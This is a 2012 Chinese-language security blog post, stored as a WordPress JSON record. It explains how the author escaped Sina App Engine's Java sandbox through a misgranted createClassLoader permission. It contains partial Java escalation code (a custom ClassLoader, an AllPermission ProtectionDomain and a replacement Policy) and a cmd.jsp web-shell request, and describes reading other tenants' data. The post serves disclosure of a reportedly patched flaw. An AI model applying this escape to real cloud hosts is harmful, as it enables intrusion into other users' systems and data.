{"id":411,"date":"2012-07-23T14:18:59","date_gmt":"2012-07-23T06:18:59","guid":{"rendered":"http:\/\/inbreak.net\/?p=411"},"modified":"2012-07-23T14:25:23","modified_gmt":"2012-07-23T06:25:23","slug":"sae%e4%ba%91%e6%9c%8d%e5%8a%a1%e5%ae%89%e5%85%a8%e6%b2%99%e7%ae%b1%e7%bb%95%e8%bf%872%e5%88%a9%e7%94%a8crackclassloader","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/411.html","title":{"rendered":"SAE\u4e91\u670d\u52a1\u5b89\u5168\u6c99\u7bb1\u7ed5\u8fc72(\u5229\u7528crackClassLoader)"},"content":{"rendered":"

by \u7a7a\u865a\u6d6a\u5b50\u5fc3 http:\/\/inbreak.net \u5fae\u535a\uff1ahttp:\/\/t.qq.com\/javasecurity<\/p>\n

\u6458\u8981<\/strong><\/p>\n

\u7ed5\u8fc7\u5b89\u5168\u6c99\u76d2\u6280\u672f\uff0c\u5e76\u975e\u53ea\u6709\u4f7f\u7528java\u6f0f\u6d1e\u624d\u80fd\u505a\u3002\u5728\u4f5c\u8005\u7684\u6587\u7ae0
\n\u300aSAE\u4e91\u670d\u52a1\u5b89\u5168\u6c99\u7bb1\u7ed5\u8fc7\u300b(http:\/\/inbreak.net\/archives\/389)
\n\u4e2d\u63d0\u5230\u4e86\u4e00\u79cd\u4f7f\u7528java\u6c99\u76d2\u6f0f\u6d1e\uff0c\u7ed5\u8fc7\u6c99\u76d2\u7684\u4f8b\u5b50\u3002\u4e8b\u5b9e\u4e0a\uff0cbypass\u4e86SAE\u6c99\u76d2\u540e\uff0c\u4f5c\u8005\u628a\u76ee\u6807\u5df2\u7ecf\u6362\u6210\u4e86GAE\uff0c\u4f46\u662f\u8fd9\u662f\u5f88\u90c1\u95f7\u7684\uff0cgoogle\u8ddf\u4e00\u5757\u94c1\u677f\u4f3c\u7684\uff0c\u4f5c\u8005\u60f3\u4e86\u5f88\u591a\u529e\u6cd5\uff0c\u90fd\u6ca1\u6709\u641e\u5b9a\u5b83\u3002\u7136\u800c\u56de\u5934\u4e00\u770b\uff0c\u4f5c\u8005\u4f7f\u7528\u7684\u90e8\u5206\u6280\u672f\uff0c\u5b8c\u5168\u662f\u53ef\u4ee5\u518d\u6b21bypass\u65b0\u6d6asae\u7684\uff0c\u5904\u4e8e\u8fd9\u79cd\u5fc3\u6001\uff0c\u4f5c\u8005\u8fd9\u6b21\u5229\u7528sae\u5f00\u53d1\u4eba\u5458\u7684\u6c99\u76d2\u8bbe\u7f6e\u5931\u8bef\uff0c\u53c8\u4e00\u6b21bypass\u4e86sae\u6c99\u76d2\u3002(\u6b64\u6f0f\u6d1e\u65b0\u6d6a\u5df2\u4fee\u8865)<\/p>\n

\u6b63\u6587<\/strong><\/p>\n

\u67e5\u770b\u6c99\u76d2\u73af\u5883<\/strong><\/p>\n

\u6765\u5230\u4e00\u4e2a\u6c99\u76d2\uff0c\u9996\u5148\u8981\u770b\u770b\u73af\u5883\uff0c\u6211\u4eec\u653e\u4e00\u4e2aJSP\u4e0a\u53bb\uff0c\u770b\u770b\u5e94\u7528\u6ca1\u6709bypass\u4e4b\u524d\u7684\u6837\u5b50\uff0c\u8bbf\u95ee<\/p>\n

http:\/\/1.cracksae.sinaapp.com\/cmd.jsp?cmd=id<\/p>\n

\u8fd4\u56de\uff1a
\n\"\"<\/a>
\n\u8fd9\u6837\u5f88\u597d\uff0c\u6807\u51c6\u7684\u6c99\u76d2\u9519\u8bef\uff0c\u6240\u4ee5\u6211\u4eec\u518d\u770b\u770bSAE\u7684\u7b56\u7565\u6587\u4ef6\uff0c\u67e5\u770b\u7b56\u7565\u6587\u4ef6\u7684\u65b9\u5f0f\uff0c\u5728\u4f5c\u8005\u4e0a\u7bc7\u6587\u7ae0\u4e2d\u5df2\u7ecf\u63d0\u5230\uff0c\u5c31\u4e0d\u518d\u8d34\u4ee3\u7801\u4e86\uff0c\u53ea\u770b\u7ed3\u679c\u3002
\n\u8bbf\u95ee\uff1a
\nhttp:\/\/1.cracksae.sinaapp.com\/permission.jsp<\/p>\n

\r\n\tstart exppermission policyfile:org.eclipse.jetty.policy.JettyPolicy@4f2d26d2 \r\n\t|name:|r.rdc.sae.sina.com.cn:3307|action:|connect,resolve| \r\n\tname:|w.rdc.sae.sina.com.cn:3307|action:|connect,resolve| \r\n        ...\u8fd9\u91cc\u6709\u5f88\u591a...\r\n\tname:|createClassLoader|action:|| \r\n\tname:|accessClassInPackage.com.sun.imageio.plugins.png|action:|| \r\n\tname:|modifyThread|action:|| \r\n\tname:|accessClassInPackage.com.sun.imageio.plugins.gif|action:|| \r\n\tname:|accessClassInPackage.sun.reflect|action:|| \r\n\tname:|accessClassInPackage.com.sun.imageio.plugins.jpeg|action:|| \r\n\tname:|getProperty.ssl.*|action:|| \r\n\tname:|insertProvider.SunJCE|action:|| \r\n\tname:|putProviderProperty.SunJCE|action:|| \r\n\tname:|suppressAccessChecks|action:|| \r\n\tname:|\/data1\/jetty_work\/908\/bypasssae\/-|action:|read| \r\n\tname:|\/usr\/java\/packages\/lib\/ext|action:|read| \r\n\tname:|jar:file:\/data1\/jetty_work\/-|action:|read| \r\n\tname:|template\/xhtml\/theme.properties|action:|read| \r\n\tname:|template\/simple\/theme.properties|action:|read| \r\n\tname:|\/usr\/local\/sae\/jetty\/-|action:|read| \r\n\tname:|\/usr\/java\/jdk1.6.0_33\/jre\/-|action:|read| \r\n\tname:|\/usr\/local\/sae\/jetty\/lib\/-|action:|read| \r\n\tname:|template\/ajax\/theme.properties|action:|read| \r\n\tname:|\/usr\/java\/jdk1.6.0_27\/jre|action:|read| \r\n\tname:|velocity.log|action:|read,write| \r\n<\/pre>\n

\u770b\u5230\u91cc\u9762\u6709\uff1a<\/p>\n

name:|createClassLoader|action:|| <\/p>\n

\u800c\u5173\u4e8e\u8fd9\u4e2a\u6743\u9650\uff0cJAVA\u5b98\u65b9\u662f\u8fd9\u6837\u8bf4\u660e\u7684\uff1a<\/p>\n

createClassLoader: This target grants permission to create a class loader. Granting this permission might allow a malicious application to instantiate its own class loader and load harmful classes into the system. Once loaded, the class loader could place these classes into any protection domain and give them full permissions for that domain. <\/p>\n

\u5c31\u662f\u8bf4\uff0c\u8fd9\u4e2a\u6743\u9650\uff0c\u662f\u5f88\u5371\u9669\u7684\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u81ea\u5df1\u5b9a\u4e49\u4e00\u4e2aMyclassloader\uff0c\u7136\u540e\u7ee7\u627fclassloader\uff0c\u8c03\u7528classloader\u7684\u65b9\u6cd5\uff0c\u751f\u6210\u4e00\u4e2aclass\uff0c\u8fd9\u65f6\u5019\u53ef\u4ee5\u7ed9class\u81ea\u5b9a\u4e49\u6743\u9650\u3002<\/p>\n

\u5199classLoader<\/strong><\/p>\n

\u6240\u4ee5\u6211\u4eec\u5199exp\uff0c\u5b9a\u4e49\u4e00\u4e2aclassLoader\uff1a<\/p>\n

\r\npublic class MyClassLoader extends ClassLoader {\r\n<\/pre>\n

\u5148\u5b9a\u4e49\u4e00\u4e2aclassloader\uff0c\u7ee7\u627fclassloader\uff0c\u5199\u4e2a\u65b9\u6cd5\u201ccommand\u201d\uff0c\u8fd9\u4e2a\u65b9\u6cd5\u8fd4\u56de\u8c03\u7528AccessController.doPrivileged\uff0c\u8bf7\u6c42\u8d85\u7ea7\u6743\u9650\u3002<\/p>\n

\r\n    public static String command() throws Exception {\r\n\r\n       return (String) AccessController.doPrivileged(new PrivilegedAction() {\r\n           public Object run() {\r\n\u2026\u2026\r\n\r\n                  String String1 = \"ExpPermissions2\";\r\n                  byte[] classData1 = {\u8fd9\u91cc\u662fExpPermissions2\u8fd9\u4e2a\u7c7b\uff0c\u5e8f\u5217\u5316\u540e\u7684byte\u6570\u7ec4\uff0c\u4ee3\u7801\u7b49\u4e0b\u8bb2\u3002};\r\n                  Class localClass = null;\r\n                  Certificate[] arrayOfCertificate = new Certificate[0];\r\n                  Permissions localPermissions = new Permissions();\r\n                  localPermissions.add(new AllPermission());\r\n                  localPermissions.add(new java.security.SecurityPermission(\r\n                         \"*\"));\r\n                  localPermissions.add(new java.security.SecurityPermission(\r\n                         \"getPolicy\"));\r\n                  ProtectionDomain localProtectionDomain = new ProtectionDomain(\r\n                         new CodeSource(localURL, arrayOfCertificate),\r\n                         localPermissions);\r\n                  byte[] datclass = {\u8fd9\u91cc\u662fMyPolicy \u7c7b\u7684\u5e8f\u5217\u5316\u6570\u7ec4\uff0c\u4ee3\u7801\u7b49\u4e0b\u8bb2\u3002};\r\n                  mycl.defineClass(\"MyPolicy\", datclass, 0, datclass.length,\r\n                         localProtectionDomain);\r\n                  try {\r\n                     Class c = mycl.loadClass(String1);\r\n                     localClass = c;\r\n                  } catch (Exception e) {\r\n                     localClass = mycl.defineClass(String1, classData1, 0,\r\n                            classData1.length, localProtectionDomain);\r\n                  }\r\n                  \u2026\u2026.\r\n<\/pre>\n

\u7ec6\u8282\u6709\u8fd9\u9762\u8fd9\u4e9b\uff1a<\/p>\n

1\u3001\u65b0\u5efa\u4e00\u4e2aProtectionDomain\uff0c\u52a0\u5165allPermissions\u6743\u9650\uff0c\u8fd9\u5c31\u662f\u6240\u6709\u6743\u9650\u90fd\u6709\u4e86\u3002
\n2\u3001\u628a\u8fd9\u4e2aProtectionDomain\u8d4b\u4e88ExpPermissions2\u8fd9\u4e2a\u7c7b\u3002
\n3\u3001\u65b0\u5efa\u4e00\u4e2a\u7c7b\uff0c\u53eb\u505aMypolicy\uff0c\u8fd9\u4e2a\u7c7b\u7ee7\u627fpolicy\uff0c\u7528\u4e8e\u52a0\u6743\u9650\u3002<\/p>\n

\u8fd9\u662f\u56e0\u4e3a\u6211\u4eec\u5f53\u524d\u7684classloader\u662f\u81ea\u5df1\u5b9e\u73b0\u7684\uff0c\u5e76\u6ca1\u6709\u52a0\u8f7d\u8fc7mypolicy\u8fd9\u4e2a\u7c7b\uff0c\u6240\u4ee5\u5fc5\u987b\u628a\u8fd9\u4e2amypolicy\u8fd9\u4e2a\u7c7b\uff0c\u8d70\u4e00\u904d\u201c\u521b\u5efa\u7c7b\uff0c\u5e76\u4e14\u8bf7\u6c42\u8d85\u7ea7\u6743\u9650\u201d\u7684\u6d41\u7a0b\u3002\u5728ExpPermissions2\u7c7b\u4e2d\uff0c\u8bbe\u7f6epolicy\uff0c\u5982\u679c\u6ca1\u6709\u5148\u7ed9ExpPermissions2\u7c7b\u8bf7\u6c42\u8d85\u7ea7\u6743\u9650\uff0c\u5c31\u65e0\u6cd5setPolicy\uff0c\u7206\u6743\u9650\u5f02\u5e38\u3002<\/p>\n

\u63d0\u6743\u4ee3\u7801<\/strong><\/p>\n

\u6211\u4eec\u770b\u770bExpPermissions2\u7684\u4ee3\u7801<\/p>\n

\r\n    public ExpPermissions2() {\r\n            AccessController.doPrivileged(this);\r\n    }\r\n    public Object run() throws Exception {\r\n       cmdresult = \"start exppermission\";\r\n       ProtectionDomain domain = this.getClass().getProtectionDomain();\r\n       \r\n       Policy.setPolicy(new MyPolicy());\r\n\r\n       PermissionCollection pcoll = Policy.getPolicy().getPermissions(domain);\r\n       cmdresult += \"policyfile:\"+(Policy.getPolicy().toString())+\"\\r\\n|\";\r\n       Enumeration enum1 = pcoll.elements();\r\n       for (; enum1.hasMoreElements(); ) {\r\n           Permission p = (Permission)enum1.nextElement();\r\n           cmdresult += (p.getName())+\"|\\r\\n\";\r\n       }\r\n       \u2026\u2026\r\n<\/pre>\n

\u91cd\u70b9\u4ee3\u7801\u5728\uff1a<\/p>\n

\r\nPolicy.setPolicy(new MyPolicy());\r\n<\/pre>\n

\u8bbe\u7f6epolicy\u4e3a\u6211\u4eec\u81ea\u5df1\u5b9e\u73b0\u7684mypolicy\uff1a
\n\u91cd\u70b9\u4ee3\u7801\uff1a<\/p>\n

\r\n    public MyPolicy() {\r\n        p = new Permissions();\r\n        p.add(new AllPermission());\r\n    }\r\n    public PermissionCollection getPermissions(ProtectionDomain cs) {\r\n        return p;\r\n    }\r\n<\/pre>\n

\u4e00\u65e6\u8bbe\u7f6e\u4e86\u8fd9\u4e2apolicy\uff0cweb\u5e94\u7528\u4e0b\u6240\u6709\u7684class\u5c31\u4f1a\u62e5\u6709\u6240\u6709\u6743\u9650\u3002
\n\u4e4b\u540e\u5c31\u662f\u547d\u4ee4\u6267\u884c\u7b49\u7b49\u60f3\u5e72\u4ec0\u4e48\u5c31\u5e72\u4ec0\u4e48\u4e86\uff0c\u76f8\u5173\u547d\u4ee4\u6267\u884c\u4ee3\u7801\uff0c\u5c31\u4e0d\u8d34\u51fa\u6765\u4e86\uff0c\u770b\u6211\u524d\u4e00\u7bc7\u6587\u7ae0\uff0c\u5c31\u80fd\u770b\u5230\u3002
\n\u6211\u4eec\u770b\u770b\u7a81\u7834\u6743\u9650\u540e\uff0c\u518d\u6b21\u663e\u793a\u6240\u6709\u6743\u9650\uff0c\u53ef\u4ee5\u770b\u5230\u53ea\u6709\u8fd9\u4e24\u4e2a\u4e86<\/p>\n

\"\"<\/a><\/p>\n

\u73b0\u5728\u62e5\u6709\u4e86\u6240\u6709\u6743\u9650\u3002<\/p>\n

\u6267\u884c\u547d\u4ee4<\/strong><\/p>\n

\u7136\u540e\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n

\"\"<\/a><\/p>\n

\u53ef\u4ee5\u8bfb\u53d6\u5176\u4ed6\u4e91\u4e0a\u7528\u6237\u7684\u6570\u636e\uff0c\u6211\u4eec\u8bfb\u4e2a\u9996\u9875\u770b\u770b\uff1a<\/p>\n

\"\"<\/a><\/p>\n

\u8fdb\u4e00\u6b65\uff0c\u5c31\u662f\u9ed1\u6389\u6240\u6709\u7684\u4e91\u4e86\uff0c\u8fd9\u4e2a\u5c31\u4e0d\u73a9\u4e86.<\/p>\n

\u603b\u7ed3\uff1a<\/strong><\/p>\n

\u672c\u6b21bypass\uff0c\u662f\u5229\u7528\u4e86SAE\u4e0a\u7684\u6c99\u76d2\u6743\u9650\u5141\u8bb8\u201ccrackClassLoader\u201d\u505a\u5230\u7684\uff0c\u7ed5\u8fc7\u6743\u9650\u540e\uff0c\u4f5c\u8005\u8c03\u7528\u4e86\u7cfb\u7edf\u547d\u4ee4\uff0c\u53bb\u8bfb\u53d6\u5176\u4ed6\u4e91\u7528\u6237\u7684\u6e90\u4ee3\u7801\u3002\u6c99\u76d2\uff0c\u5c24\u5176\u662f\u7528\u5728\u4e91\u4e0a\u7684\u6c99\u76d2\uff0c\u5b89\u5168\u914d\u7f6e\u662f\u5f88\u91cd\u8981\u7684\uff0c\u5f88\u591a\u6743\u9650\u5e76\u4e0d\u662f\u53ef\u4ee5\u968f\u4fbf\u4ea4\u7ed9\u7528\u6237\u7684\uff0c\u8fd9\u6b21\u6709\u4e86crackCLassLoaer\uff0c\u57fa\u672c\u4e0a\u662f\u4e00\u4e2a\u6700\u597d\u7528\u7684\u63d0\u6743\u529e\u6cd5\u4e86\uff0c\u5176\u5b9e\u8fd8\u6709\u5f88\u591a\u5176\u4ed6\u7684\u6743\u9650\uff0c\u90fd\u662f\u5f88\u4e0d\u5b89\u5168\u7684\u3002\u8fd9\u8981\u4ed4\u7ec6\u659f\u914c\u4ee5\u540e\uff0c\u624d\u80fd\u5f00\u7ed9\u7528\u6237\uff0c\u5426\u5219\u5c31\u662f\u4e00\u4e2a\u707e\u96be\u3002<\/p>\n

by \u7a7a\u865a\u6d6a\u5b50\u5fc3 http:\/\/inbreak.net \u5fae\u535a\uff1ahttp:\/\/t.qq.com\/javasecurity<\/p>\n","protected":false},"excerpt":{"rendered":"

\u5728\u4f5c\u8005\u4e0a\u6b21\u6587\u7ae0\u300aSAE\u4e91\u670d\u52a1\u5b89\u5168\u6c99\u7bb1\u7ed5\u8fc7\u300b(http:\/\/inbreak.net\/archives\/389)\uff0c\u4e2d\u63d0\u5230\u4e86\u4e00\u79cd\u4f7f\u7528java\u6c99\u76d2\u6f0f\u6d1e\uff0c\u7ed5\u8fc7\u6c99\u76d2\u7684\u4f8b\u5b50\u3002\u4e8b\u5b9e\u4e0a\uff0cbypass\u4e86sae\u540e\uff0c\u4f5c\u8005\u628a\u76ee\u6807\u5df2\u7ecf\u6362\u6210\u4e86google\uff0c\u4f46\u662f\u8fd9\u662f\u5f88\u90c1\u95f7\u7684\uff0cgoogle\u8ddf\u4e00\u5757\u94c1\u677f\u4f3c\u7684\uff0c\u4f5c\u8005\u60f3\u4e86\u5f88\u591a\u529e\u6cd5\uff0c\u90fd\u6ca1\u6709\u641e\u5b9a\u4ed6\u3002\u7136\u800c\u56de\u5934\u4e00\u770b\uff0c\u4f5c\u8005\u4f7f\u7528\u7684\u90e8\u5206\u6280\u672f\uff0c\u5b8c\u5168\u662f\u53ef\u4ee5\u518d\u6b21bypass\u65b0\u6d6asae\u7684\uff0c\u5904\u4e8e\u8fd9\u79cd\u5fc3\u6001\uff0c\u4f5c\u8005\u8fd9\u6b21\u5229\u7528sae\u5f00\u53d1\u4eba\u5458\u7684\u6c99\u76d2\u8bbe\u7f6e\u5931\u8bef\uff0c\u53c8\u4e00\u6b21bypass\u4e86sae\u6c99\u76d2\u3002(\u6b64\u6f0f\u6d1e\u65b0\u6d6a\u5df2\u4fee\u8865)<\/p>\n

\u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[84,86,5],"tags":[14,101,107,99,103,105],"views":13132,"_links":{"self":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/411"}],"collection":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/comments?post=411"}],"version-history":[{"count":3,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/411\/revisions"}],"predecessor-version":[{"id":425,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/411\/revisions\/425"}],"wp:attachment":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/media?parent=411"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/categories?post=411"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/tags?post=411"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}